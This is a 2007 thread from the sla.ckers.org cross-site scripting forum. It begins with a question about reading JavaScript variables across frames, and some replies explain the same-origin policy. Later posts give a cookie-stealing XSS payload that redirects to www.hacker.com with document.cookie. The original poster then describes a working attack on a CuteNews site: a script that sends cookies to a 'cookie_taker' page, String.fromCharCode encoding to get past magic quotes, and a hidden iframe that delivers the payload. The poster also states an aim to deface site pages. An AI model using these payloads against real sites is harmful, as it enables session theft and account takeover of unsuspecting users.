Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Retrieve data from another instance of Javascript
Date: March 22, 2007 02:33PM

Is it possible to retrieve data from another instance of Javascript? I know "x" versus "var x" is more global, but the following example didn't work.

<iframe src="http://example.com/page.php?varName=%3Cscript%3Ex=document.cookie%3C/script%3E">
<script>alert(x);</script>

Options: ReplyQuote
Re: Retrieve data from another instance of Javascript
Posted by: Kyran
Date: March 22, 2007 02:37PM

I've never really played around with that.
It's a longshot, but does document.iframes[#].x work?

- Kyran

Options: ReplyQuote
Re: Retrieve data from another instance of Javascript
Posted by: trev
Date: March 22, 2007 02:56PM

You cannot get JavaScript variables from a frame unless you both your page and the frame are on the same host. Otherwise: JavaScript communication across frames is forbidden (though generated events might do the trick Edit: tested this - no, bubbling events don't go across frame boundaries either). Why do you need it? To send the cookie to yourself you would still need to trigger some URL from your server, you can do it inside the frame just as well.



Edited 1 time(s). Last edit at 03/22/2007 02:59PM by trev.

Options: ReplyQuote
Re: Retrieve data from another instance of Javascript
Date: March 22, 2007 03:09PM

Hi Trev. I'm not sure how you meant that. I tried

<iframe src="http://example.com/page.php">
<script>
alert(document.cookie);
</script>
</iframe>

and it did not work for me. The only way I know is to write the AJAX as part of the URL's query string, but magic slashes are enabled on the website server and I think I need single quotes.



Edited 1 time(s). Last edit at 03/22/2007 03:28PM by digitalIllusionism.

Options: ReplyQuote
Re: Retrieve data from another instance of Javascript
Date: March 22, 2007 04:17PM

I'm on the Wii right now so I can't play with it right now, but can't you target the document.scripts property on the frame, and extract it that way? I'm not sure if it'll work as it may violate the permissions aspect, but in theory it should work.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: Retrieve data from another instance of Javascript
Date: March 22, 2007 10:23PM

I'd have to see an example to understand the method you mean. Wouldn't it defeat the purpose of finding an injection if you could just access cookies of any embedded iframe?
I'm guessing the AJAX has to be part of the iframe URL query string.

Edit: It's a somewhat baseless guess though.



Edited 4 time(s). Last edit at 03/22/2007 10:33PM by digitalIllusionism.

Options: ReplyQuote
Re: Retrieve data from another instance of Javascript
Posted by: hasse
Date: March 23, 2007 12:49PM

Hmm, I just remembered something I read about transferring data between domains using anchors (#), anyone remember what site that was on?

Options: ReplyQuote
Re: Retrieve data from another instance of Javascript
Posted by: tx
Date: March 23, 2007 02:20PM

@hasse: http://sla.ckers.org/forum/read.php?2,6684,6766#msg-6766

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 03/23/2007 02:20PM by tx.

Options: ReplyQuote
Re: Retrieve data from another instance of Javascript
Posted by: jungsonn
Date: March 23, 2007 09:45PM

@hasse

Do you mean the dojo toolkit crossdomain ajax requests?

Options: ReplyQuote
Re: Retrieve data from another instance of Javascript
Posted by: trev
Date: March 23, 2007 10:32PM

digitalillusionism, that's not how it works. An iframe has a window/document of its own, you don't have direct access to it. Your example would need to be changed like this:
<iframe src="http://example.com/page.php">
<script>
alert(frames[0].document.cookie);
</script>
</iframe>
But browsers forbid cross-domain access. The page cannot access the document from this frame unless this page is located on example.com as well. Note: not "www.example.com", not "something.example.com", only "example.com" is allowed to access "example.com" - an exact match is required. More about the same origin rule: http://www.mozilla.org/projects/security/components/same-origin.html

Options: ReplyQuote
Re: Retrieve data from another instance of Javascript
Date: March 24, 2007 02:50PM

@Trev
This testing has been done on Cutenews software. I can write HTML/Javascript to the page by passing it in through a GET variable.
Place I found vulnerability list.
In this thread, I asked what good injection could do and you said I could run the URL in a hidden iframe, and execute Javascript with the permissions of that user. If I can do that anyways just by going

<iframe src="http://example.com/page.php">
<script>
Javascript here;
Javascript here;
Javascript here;
</script>
</iframe>

then what advantage is there to injection?

I know there is a reason and it's my lack of understanding so thanks for explaining.

Options: ReplyQuote
Re: Retrieve data from another instance of Javascript
Posted by: FR3DC3RV
Date: March 24, 2007 03:08PM

@digitallllusion
You can use an iframe in one site to retrieve the cookies of another site.(or run code in that site as if you were the user)

-------------------------------
http://fr3dc3rv.blogspot.com

Options: ReplyQuote
Re: Retrieve data from another instance of Javascript
Date: March 24, 2007 03:45PM

> You can use an iframe in one site to retrieve the cookies of another site.

How can I retrieve cookies from another site if cross-domain access is forbidden?

I can run Javascript as if I'm that user, sure, but what power does that give me? What security risk does that pose to them? If Javascript can't modify one of their existing files (maybe it can and I'm not aware), I'm not sure why they'd bother fixing it. I can alert myself. I can redirect myself. I can make animations that I see. I can see my own cookies. I can set cookies on my computer and so on, but what effect can that have on the site owner?
Of course, this is my lack of understanding again. Thanks for any answers.



Edited 3 time(s). Last edit at 03/24/2007 04:00PM by digitalIllusionism.

Options: ReplyQuote
Re: Retrieve data from another instance of Javascript
Date: March 24, 2007 04:34PM

I'm not so sure I understood your last query (it was a long night), but if you're looking to be able to have more drastic effects such as modifying users' files and what-not then you need to look in to vulnerabilities for the browsers themselves and how they handle objects and files located in the operating system so that you can embed some form of a third party file, such as a trojan, to cause things to happen offline. I have many examples from back in 2004 where APPLET was embedded into pages, set up with a certain classid string, and then called via Javascript to execute registry changes. It seems like you're looking more for those effects so the best thing to do is actively search out pages you know that contain working vulnerabilities, viewing the source remotely or use a client to request the data, and then analyze the scripts in question. Like I said, it was a long night, and so if this is not what you're looking to do then disregard my comment.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: Retrieve data from another instance of Javascript
Date: March 24, 2007 05:40PM

Oh, no. When I said modify their files, I was referring to the website's files. In other words, I'd like to make it say, "Testing" on one of the regular site pages that everybody sees. I'd like to do something that defies the intended restrictions if cookie theft or gaining full permissions is not possible.

Options: ReplyQuote
Re: Retrieve data from another instance of Javascript
Posted by: FR3DC3RV
Date: March 24, 2007 05:46PM

Yes, it's true that you cant popup an alert box trough an iframe, however something like this will work:
XSS Code:
<script>location.href="h**p://www.hacker.com/code?"+document.cookie</script>

It will redirect the iframe to the www.hacker.com, and will send the cookies to the hacker's server.

> but what effect can that have on the site owner?
Pardom me if i don't get it.
If you are talking about a common user. you can use an iframe in a popular site that (using CSRF) defaces the content of the personal profile of that user.
If you are talking about the webmaster you can't do much, however you can deface lots of users's profiles.

>I can redirect myself. I can make animations that I see. I can see my own cookies.

You can redirect other users to other sites, you can make animations that other users see, the user can see its cookies.It all depends on the type of XSS, if it is persistent every time a user sees that page the javascript will run, if it is reflect you will need to send a email with the link or create an iframe in other site.

EDIT: You posted faster than me.

-------------------------------
http://fr3dc3rv.blogspot.com



Edited 1 time(s). Last edit at 03/24/2007 05:49PM by FR3DC3RV.

Options: ReplyQuote
Re: Retrieve data from another instance of Javascript
Date: March 24, 2007 08:27PM

I got it working.

Javascript fully works for my target site if it is injected via GET variable.

First I wrote what I wanted to run.
<script>c=escape(document.cookie);location.href="http://www.mysite.com/cookie_taker?varName="+c</script>

Then I had to evade magic slashes so I used the XSS Cheat Sheet and to go
<script>document.write(String.fromCharCode(EXAMPLE,ABOVE,IN,DEC,FORMAT))</script>

Then went
<iframe src="http://cutenews_site.com?injectable_var=<script>document.write(String.fromCharCode(FIRST,EXAMPLE,IN,DEC,FORMAT))</script>" style="display:none;"></iframe>

It's probably old news for everyone but new and fun for me :=]
I incorporated ideas from this thread and learned a lot, especially the domain restriction part.
Thank you.

Edit: I forgot the = in the first URL.



Edited 1 time(s). Last edit at 03/25/2007 11:30AM by digitalIllusionism.

Options: ReplyQuote
Re: Retrieve data from another instance of Javascript
Posted by: FR3DC3RV
Date: March 25, 2007 03:54AM

Nice.

-------------------------------
http://fr3dc3rv.blogspot.com

Options: ReplyQuote
Re: Retrieve data from another instance of Javascript
Posted by: hasse
Date: March 25, 2007 05:04AM

@tx: I believe that was something other than what I was thinking about.

jungsonn Wrote:
-------------------------------------------------------
> @hasse
>
> Do you mean the dojo toolkit crossdomain ajax
> requests?

Yes, perhaps that was it. I found a page here that describes it:
http://tagneto.blogspot.com/2006/06/cross-domain-frame-communication-with.html



Edited 1 time(s). Last edit at 03/25/2007 05:05AM by hasse.

Options: ReplyQuote
Re: Retrieve data from another instance of Javascript
Date: March 25, 2007 11:41AM

@Trev
I'm re-reading this thread and I see what you meant now. :=]



Edited 1 time(s). Last edit at 03/25/2007 11:41AM by digitalIllusionism.

Options: ReplyQuote


Sorry, only registered users may post in this forum.